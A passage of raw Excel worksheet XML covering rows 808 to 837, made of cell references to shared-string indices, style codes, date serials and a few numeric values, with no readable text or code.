      <c r="K808" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L808" t="s">
        <v>77</v>
      </c>
      <c r="P808" t="s">
        <v>181</v>
      </c>
      <c r="Q808" s="95" t="s">
        <v>976</v>
      </c>
      <c r="W808" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="809" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A809" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B809" s="52"/>
      <c r="C809" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D809" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E809" s="95" t="s">
        <v>2545</v>
      </c>
      <c r="F809" s="42">
        <v>200</v>
      </c>
      <c r="G809" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H809" t="s">
        <v>2547</v>
      </c>
      <c r="I809" t="s">
        <v>179</v>
      </c>
      <c r="J809" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K809" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L809" t="s">
        <v>77</v>
      </c>
      <c r="P809" t="s">
        <v>181</v>
      </c>
      <c r="Q809" s="95" t="s">
        <v>2548</v>
      </c>
      <c r="W809" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="810" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A810" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B810" s="52"/>
      <c r="C810" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D810" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E810" s="95" t="s">
        <v>2549</v>
      </c>
      <c r="F810" s="42">
        <v>100</v>
      </c>
      <c r="G810" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H810" t="s">
        <v>2550</v>
      </c>
      <c r="I810" t="s">
        <v>156</v>
      </c>
      <c r="J810" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K810" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L810" t="s">
        <v>77</v>
      </c>
      <c r="M810" s="95" t="s">
        <v>509</v>
      </c>
      <c r="N810" t="s">
        <v>510</v>
      </c>
      <c r="Q810" s="95" t="s">
        <v>2551</v>
      </c>
      <c r="W810" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="811" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A811" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B811" s="52"/>
      <c r="C811" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D811" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E811" s="95" t="s">
        <v>2552</v>
      </c>
      <c r="F811" s="42">
        <v>100</v>
      </c>
      <c r="G811" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H811" t="s">
        <v>2553</v>
      </c>
      <c r="I811" t="s">
        <v>833</v>
      </c>
      <c r="J811" s="95" t="s">
        <v>25</v>
      </c>
      <c r="K811" s="95" t="s">
        <v>25</v>
      </c>
      <c r="L811" t="s">
        <v>77</v>
      </c>
      <c r="M811" s="95" t="s">
        <v>834</v>
      </c>
      <c r="N811" t="s">
        <v>835</v>
      </c>
      <c r="Q811" s="95" t="s">
        <v>880</v>
      </c>
      <c r="W811" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="812" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A812" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B812" s="52"/>
      <c r="C812" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D812" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E812" s="95" t="s">
        <v>2554</v>
      </c>
      <c r="F812" s="42">
        <v>100</v>
      </c>
      <c r="G812" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H812" t="s">
        <v>2555</v>
      </c>
      <c r="I812" t="s">
        <v>179</v>
      </c>
      <c r="J812" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K812" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L812" t="s">
        <v>77</v>
      </c>
      <c r="Q812" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W812" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="813" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A813" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B813" s="52"/>
      <c r="C813" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D813" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E813" s="95" t="s">
        <v>2556</v>
      </c>
      <c r="F813" s="42">
        <v>100</v>
      </c>
      <c r="G813" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H813" t="s">
        <v>2557</v>
      </c>
      <c r="I813" t="s">
        <v>75</v>
      </c>
      <c r="J813" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K813" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L813" t="s">
        <v>83</v>
      </c>
      <c r="M813" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N813" t="s">
        <v>221</v>
      </c>
      <c r="P813" t="s">
        <v>516</v>
      </c>
      <c r="Q813" s="95" t="s">
        <v>2558</v>
      </c>
      <c r="W813" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="814" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A814" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B814" s="52"/>
      <c r="C814" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D814" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E814" s="95" t="s">
        <v>2559</v>
      </c>
      <c r="F814" s="42">
        <v>100</v>
      </c>
      <c r="G814" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H814" t="s">
        <v>2560</v>
      </c>
      <c r="I814" t="s">
        <v>31</v>
      </c>
      <c r="J814" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K814" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L814" t="s">
        <v>77</v>
      </c>
      <c r="M814" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N814" t="s">
        <v>263</v>
      </c>
      <c r="P814" t="s">
        <v>264</v>
      </c>
      <c r="Q814" s="95" t="s">
        <v>2561</v>
      </c>
      <c r="W814" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="815" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A815" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B815" s="52"/>
      <c r="C815" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D815" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E815" s="95" t="s">
        <v>2562</v>
      </c>
      <c r="F815" s="42">
        <v>100</v>
      </c>
      <c r="G815" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H815" t="s">
        <v>2563</v>
      </c>
      <c r="I815" t="s">
        <v>196</v>
      </c>
      <c r="J815" s="95" t="s">
        <v>722</v>
      </c>
      <c r="K815" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L815" t="s">
        <v>77</v>
      </c>
      <c r="M815" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N815" t="s">
        <v>198</v>
      </c>
      <c r="P815" t="s">
        <v>723</v>
      </c>
      <c r="Q815" s="95" t="s">
        <v>1703</v>
      </c>
      <c r="W815" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="816" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A816" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B816" s="52"/>
      <c r="C816" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D816" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E816" s="95" t="s">
        <v>2564</v>
      </c>
      <c r="F816" s="42">
        <v>100</v>
      </c>
      <c r="G816" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H816" t="s">
        <v>2565</v>
      </c>
      <c r="I816" t="s">
        <v>103</v>
      </c>
      <c r="J816" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K816" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L816" t="s">
        <v>77</v>
      </c>
      <c r="M816" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P816" t="s">
        <v>2566</v>
      </c>
      <c r="Q816" s="95" t="s">
        <v>2567</v>
      </c>
      <c r="W816" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="817" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A817" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B817" s="52"/>
      <c r="C817" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D817" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E817" s="95" t="s">
        <v>2568</v>
      </c>
      <c r="F817" s="42">
        <v>100</v>
      </c>
      <c r="G817" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H817" t="s">
        <v>2569</v>
      </c>
      <c r="I817" t="s">
        <v>31</v>
      </c>
      <c r="J817" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K817" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L817" t="s">
        <v>77</v>
      </c>
      <c r="M817" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N817" t="s">
        <v>263</v>
      </c>
      <c r="P817" t="s">
        <v>2019</v>
      </c>
      <c r="Q817" s="95" t="s">
        <v>2570</v>
      </c>
      <c r="W817" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="818" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A818" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B818" s="52"/>
      <c r="C818" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D818" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E818" s="95" t="s">
        <v>2571</v>
      </c>
      <c r="F818" s="42">
        <v>100</v>
      </c>
      <c r="G818" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H818" t="s">
        <v>2572</v>
      </c>
      <c r="I818" t="s">
        <v>196</v>
      </c>
      <c r="J818" s="95" t="s">
        <v>722</v>
      </c>
      <c r="K818" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L818" t="s">
        <v>77</v>
      </c>
      <c r="M818" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N818" t="s">
        <v>198</v>
      </c>
      <c r="P818" t="s">
        <v>723</v>
      </c>
      <c r="Q818" s="95" t="s">
        <v>2573</v>
      </c>
      <c r="W818" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="819" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A819" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B819" s="52">
        <v>43840.498662662038</v>
      </c>
      <c r="C819" s="95" t="s">
        <v>2574</v>
      </c>
      <c r="D819" s="96">
        <v>101</v>
      </c>
      <c r="E819" s="95" t="s">
        <v>2575</v>
      </c>
      <c r="F819" s="42">
        <v>101</v>
      </c>
      <c r="G819" s="95" t="s">
        <v>2576</v>
      </c>
      <c r="H819" t="s">
        <v>2577</v>
      </c>
      <c r="I819" t="s">
        <v>179</v>
      </c>
      <c r="J819" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K819" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L819" t="s">
        <v>77</v>
      </c>
      <c r="O819" s="95" t="s">
        <v>2578</v>
      </c>
      <c r="P819" t="s">
        <v>181</v>
      </c>
      <c r="Q819" s="95" t="s">
        <v>2579</v>
      </c>
      <c r="R819">
        <v>11</v>
      </c>
      <c r="S819">
        <v>8</v>
      </c>
      <c r="T819">
        <v>43</v>
      </c>
      <c r="U819">
        <v>73</v>
      </c>
      <c r="V819">
        <v>56</v>
      </c>
      <c r="W819" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="820" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A820" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B820" s="52">
        <v>44047.731314027777</v>
      </c>
      <c r="C820" s="95" t="s">
        <v>2580</v>
      </c>
      <c r="D820" s="96">
        <v>100</v>
      </c>
      <c r="E820" s="95" t="s">
        <v>2581</v>
      </c>
      <c r="F820" s="42">
        <v>100</v>
      </c>
      <c r="G820" s="95" t="s">
        <v>2582</v>
      </c>
      <c r="H820" t="s">
        <v>2583</v>
      </c>
      <c r="I820" t="s">
        <v>185</v>
      </c>
      <c r="J820" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K820" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L820" t="s">
        <v>83</v>
      </c>
      <c r="M820" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O820" s="95" t="s">
        <v>2584</v>
      </c>
      <c r="Q820" s="95" t="s">
        <v>2585</v>
      </c>
      <c r="R820">
        <v>488622</v>
      </c>
      <c r="S820">
        <v>553729</v>
      </c>
      <c r="T820">
        <v>488258</v>
      </c>
      <c r="U820">
        <v>532334</v>
      </c>
      <c r="V820">
        <v>594858</v>
      </c>
      <c r="W820" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="821" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A821" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B821" s="52">
        <v>44047.731314027777</v>
      </c>
      <c r="C821" s="95" t="s">
        <v>2580</v>
      </c>
      <c r="D821" s="96">
        <v>300</v>
      </c>
      <c r="E821" s="95" t="s">
        <v>2581</v>
      </c>
      <c r="F821" s="42">
        <v>100</v>
      </c>
      <c r="G821" s="95" t="s">
        <v>2586</v>
      </c>
      <c r="H821" t="s">
        <v>2583</v>
      </c>
      <c r="I821" t="s">
        <v>185</v>
      </c>
      <c r="J821" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K821" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L821" t="s">
        <v>83</v>
      </c>
      <c r="M821" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O821" s="95" t="s">
        <v>2584</v>
      </c>
      <c r="Q821" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W821" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="822" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A822" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B822" s="52">
        <v>44047.731314004632</v>
      </c>
      <c r="C822" s="95" t="s">
        <v>2580</v>
      </c>
      <c r="D822" s="96">
        <v>100</v>
      </c>
      <c r="E822" s="95" t="s">
        <v>2587</v>
      </c>
      <c r="F822" s="42">
        <v>100</v>
      </c>
      <c r="G822" s="95" t="s">
        <v>2588</v>
      </c>
      <c r="H822" t="s">
        <v>2589</v>
      </c>
      <c r="I822" t="s">
        <v>185</v>
      </c>
      <c r="J822" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K822" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L822" t="s">
        <v>83</v>
      </c>
      <c r="M822" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O822" s="95" t="s">
        <v>2590</v>
      </c>
      <c r="Q822" s="95" t="s">
        <v>2585</v>
      </c>
      <c r="R822">
        <v>864184</v>
      </c>
      <c r="S822">
        <v>810462</v>
      </c>
      <c r="T822">
        <v>758411</v>
      </c>
      <c r="U822">
        <v>719610</v>
      </c>
      <c r="V822">
        <v>800650</v>
      </c>
      <c r="W822" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="823" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A823" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B823" s="52">
        <v>44047.731314004632</v>
      </c>
      <c r="C823" s="95" t="s">
        <v>2580</v>
      </c>
      <c r="D823" s="96">
        <v>300</v>
      </c>
      <c r="E823" s="95" t="s">
        <v>2587</v>
      </c>
      <c r="F823" s="42">
        <v>100</v>
      </c>
      <c r="H823" t="s">
        <v>2589</v>
      </c>
      <c r="I823" t="s">
        <v>185</v>
      </c>
      <c r="J823" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K823" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L823" t="s">
        <v>83</v>
      </c>
      <c r="M823" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O823" s="95" t="s">
        <v>2590</v>
      </c>
      <c r="Q823" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W823" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="824" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A824" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B824" s="52">
        <v>44047.731314039353</v>
      </c>
      <c r="C824" s="95" t="s">
        <v>2580</v>
      </c>
      <c r="D824" s="96">
        <v>100</v>
      </c>
      <c r="E824" s="95" t="s">
        <v>2591</v>
      </c>
      <c r="F824" s="42">
        <v>100</v>
      </c>
      <c r="H824" t="s">
        <v>2592</v>
      </c>
      <c r="I824" t="s">
        <v>185</v>
      </c>
      <c r="J824" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K824" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L824" t="s">
        <v>83</v>
      </c>
      <c r="M824" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O824" s="95" t="s">
        <v>2593</v>
      </c>
      <c r="Q824" s="95" t="s">
        <v>2585</v>
      </c>
      <c r="W824" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="825" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A825" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B825" s="52">
        <v>44047.731314039353</v>
      </c>
      <c r="C825" s="95" t="s">
        <v>2580</v>
      </c>
      <c r="D825" s="96">
        <v>300</v>
      </c>
      <c r="E825" s="95" t="s">
        <v>2591</v>
      </c>
      <c r="F825" s="42">
        <v>100</v>
      </c>
      <c r="H825" t="s">
        <v>2592</v>
      </c>
      <c r="I825" t="s">
        <v>185</v>
      </c>
      <c r="J825" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K825" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L825" t="s">
        <v>83</v>
      </c>
      <c r="M825" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O825" s="95" t="s">
        <v>2593</v>
      </c>
      <c r="Q825" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W825" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="826" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A826" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B826" s="52"/>
      <c r="C826" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D826" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E826" s="95" t="s">
        <v>2594</v>
      </c>
      <c r="F826" s="42">
        <v>100</v>
      </c>
      <c r="G826" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H826" t="s">
        <v>2595</v>
      </c>
      <c r="I826" t="s">
        <v>156</v>
      </c>
      <c r="J826" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K826" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L826" t="s">
        <v>77</v>
      </c>
      <c r="M826" s="95" t="s">
        <v>227</v>
      </c>
      <c r="N826" t="s">
        <v>228</v>
      </c>
      <c r="Q826" s="95" t="s">
        <v>465</v>
      </c>
      <c r="W826" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="827" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A827" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B827" s="52"/>
      <c r="C827" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D827" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E827" s="95" t="s">
        <v>2596</v>
      </c>
      <c r="F827" s="42">
        <v>100</v>
      </c>
      <c r="G827" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H827" t="s">
        <v>2597</v>
      </c>
      <c r="I827" t="s">
        <v>156</v>
      </c>
      <c r="J827" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K827" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L827" t="s">
        <v>77</v>
      </c>
      <c r="M827" s="95" t="s">
        <v>509</v>
      </c>
      <c r="N827" t="s">
        <v>510</v>
      </c>
      <c r="Q827" s="95" t="s">
        <v>465</v>
      </c>
      <c r="W827" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="828" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A828" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B828" s="52">
        <v>43481.669218506948</v>
      </c>
      <c r="C828" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D828" s="96">
        <v>111</v>
      </c>
      <c r="E828" s="95" t="s">
        <v>2599</v>
      </c>
      <c r="F828" s="42">
        <v>102</v>
      </c>
      <c r="G828" s="95" t="s">
        <v>2600</v>
      </c>
      <c r="H828" t="s">
        <v>1074</v>
      </c>
      <c r="I828" t="s">
        <v>185</v>
      </c>
      <c r="J828" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K828" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L828" t="s">
        <v>83</v>
      </c>
      <c r="M828" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O828" s="95" t="s">
        <v>2601</v>
      </c>
      <c r="Q828" s="95" t="s">
        <v>2602</v>
      </c>
      <c r="W828" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="829" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A829" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B829" s="52">
        <v>43481.669218483796</v>
      </c>
      <c r="C829" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D829" s="96">
        <v>111</v>
      </c>
      <c r="E829" s="95" t="s">
        <v>2603</v>
      </c>
      <c r="F829" s="42">
        <v>100</v>
      </c>
      <c r="G829" s="95" t="s">
        <v>2604</v>
      </c>
      <c r="H829" t="s">
        <v>2605</v>
      </c>
      <c r="I829" t="s">
        <v>210</v>
      </c>
      <c r="J829" s="95" t="s">
        <v>211</v>
      </c>
      <c r="K829" s="95" t="s">
        <v>30</v>
      </c>
      <c r="L829" t="s">
        <v>83</v>
      </c>
      <c r="M829" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O829" s="95" t="s">
        <v>2601</v>
      </c>
      <c r="Q829" s="95" t="s">
        <v>2602</v>
      </c>
      <c r="W829" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="830" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A830" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B830" s="52"/>
      <c r="C830" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D830" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E830" s="95" t="s">
        <v>2606</v>
      </c>
      <c r="F830" s="42">
        <v>100</v>
      </c>
      <c r="G830" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H830" t="s">
        <v>2607</v>
      </c>
      <c r="I830" t="s">
        <v>179</v>
      </c>
      <c r="J830" s="95" t="s">
        <v>1006</v>
      </c>
      <c r="K830" s="95" t="s">
        <v>23</v>
      </c>
      <c r="L830" t="s">
        <v>77</v>
      </c>
      <c r="M830" s="95" t="s">
        <v>1006</v>
      </c>
      <c r="N830" t="s">
        <v>1007</v>
      </c>
      <c r="Q830" s="95" t="s">
        <v>2608</v>
      </c>
      <c r="W830" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="831" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A831" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B831" s="52">
        <v>44047.489031041667</v>
      </c>
      <c r="C831" s="95" t="s">
        <v>2609</v>
      </c>
      <c r="D831" s="96">
        <v>100</v>
      </c>
      <c r="E831" s="95" t="s">
        <v>2610</v>
      </c>
      <c r="F831" s="42">
        <v>100</v>
      </c>
      <c r="G831" s="95" t="s">
        <v>2611</v>
      </c>
      <c r="H831" t="s">
        <v>2612</v>
      </c>
      <c r="I831" t="s">
        <v>179</v>
      </c>
      <c r="J831" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K831" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L831" t="s">
        <v>77</v>
      </c>
      <c r="M831" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="O831" s="95" t="s">
        <v>2613</v>
      </c>
      <c r="Q831" s="95" t="s">
        <v>1406</v>
      </c>
      <c r="W831" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="832" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A832" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B832" s="52"/>
      <c r="C832" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D832" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E832" s="95" t="s">
        <v>2614</v>
      </c>
      <c r="F832" s="42">
        <v>100</v>
      </c>
      <c r="G832" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H832" t="s">
        <v>2615</v>
      </c>
      <c r="I832" t="s">
        <v>156</v>
      </c>
      <c r="J832" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K832" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L832" t="s">
        <v>77</v>
      </c>
      <c r="M832" s="95" t="s">
        <v>227</v>
      </c>
      <c r="N832" t="s">
        <v>228</v>
      </c>
      <c r="Q832" s="95" t="s">
        <v>1133</v>
      </c>
      <c r="W832" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="833" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A833" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B833" s="52"/>
      <c r="C833" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D833" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E833" s="95" t="s">
        <v>2616</v>
      </c>
      <c r="F833" s="42">
        <v>100</v>
      </c>
      <c r="G833" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H833" t="s">
        <v>2617</v>
      </c>
      <c r="I833" t="s">
        <v>75</v>
      </c>
      <c r="J833" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K833" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L833" t="s">
        <v>77</v>
      </c>
      <c r="M833" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N833" t="s">
        <v>91</v>
      </c>
      <c r="Q833" s="95" t="s">
        <v>2618</v>
      </c>
      <c r="W833" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="834" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A834" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B834" s="52">
        <v>44524.833629583336</v>
      </c>
      <c r="C834" s="95" t="s">
        <v>2619</v>
      </c>
      <c r="D834" s="96">
        <v>105</v>
      </c>
      <c r="E834" s="95" t="s">
        <v>2620</v>
      </c>
      <c r="F834" s="42">
        <v>115</v>
      </c>
      <c r="G834" s="95" t="s">
        <v>2621</v>
      </c>
      <c r="H834" t="s">
        <v>2622</v>
      </c>
      <c r="I834" t="s">
        <v>17</v>
      </c>
      <c r="J834" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K834" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L834" t="s">
        <v>83</v>
      </c>
      <c r="M834" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q834" s="95" t="s">
        <v>2623</v>
      </c>
      <c r="R834">
        <v>566667</v>
      </c>
      <c r="S834">
        <v>392688</v>
      </c>
      <c r="T834">
        <v>615224</v>
      </c>
      <c r="U834">
        <v>536617</v>
      </c>
      <c r="V834">
        <v>483216</v>
      </c>
      <c r="W834" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="835" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A835" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B835" s="52">
        <v>44467.868079178239</v>
      </c>
      <c r="C835" s="95" t="s">
        <v>2624</v>
      </c>
      <c r="D835" s="96">
        <v>101</v>
      </c>
      <c r="E835" s="95" t="s">
        <v>2625</v>
      </c>
      <c r="F835" s="42">
        <v>101</v>
      </c>
      <c r="G835" s="95" t="s">
        <v>2626</v>
      </c>
      <c r="H835" t="s">
        <v>2627</v>
      </c>
      <c r="I835" t="s">
        <v>833</v>
      </c>
      <c r="J835" s="95" t="s">
        <v>25</v>
      </c>
      <c r="K835" s="95" t="s">
        <v>25</v>
      </c>
      <c r="L835" t="s">
        <v>77</v>
      </c>
      <c r="M835" s="95" t="s">
        <v>25</v>
      </c>
      <c r="N835" t="s">
        <v>835</v>
      </c>
      <c r="Q835" s="95" t="s">
        <v>2628</v>
      </c>
      <c r="R835">
        <v>17102</v>
      </c>
      <c r="S835">
        <v>12956</v>
      </c>
      <c r="T835">
        <v>11486</v>
      </c>
      <c r="U835">
        <v>12777</v>
      </c>
      <c r="V835">
        <v>14614</v>
      </c>
      <c r="W835" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="836" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A836" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B836" s="52"/>
      <c r="C836" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D836" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E836" s="95" t="s">
        <v>2629</v>
      </c>
      <c r="F836" s="42">
        <v>100</v>
      </c>
      <c r="G836" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H836" t="s">
        <v>2630</v>
      </c>
      <c r="I836" t="s">
        <v>179</v>
      </c>
      <c r="J836" s="95" t="s">
        <v>1006</v>
      </c>
      <c r="K836" s="95" t="s">
        <v>23</v>
      </c>
      <c r="L836" t="s">
        <v>77</v>
      </c>
      <c r="M836" s="95" t="s">
        <v>1006</v>
      </c>
      <c r="N836" t="s">
        <v>1007</v>
      </c>
      <c r="P836" t="s">
        <v>942</v>
      </c>
      <c r="Q836" s="95" t="s">
        <v>2631</v>
      </c>
      <c r="W836" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="837" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A837" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B837" s="52"/>
      <c r="C837" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D837" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E837" s="95" t="s">
        <v>2632</v>
      </c>
      <c r="F837" s="42">
        <v>100</v>
      </c>
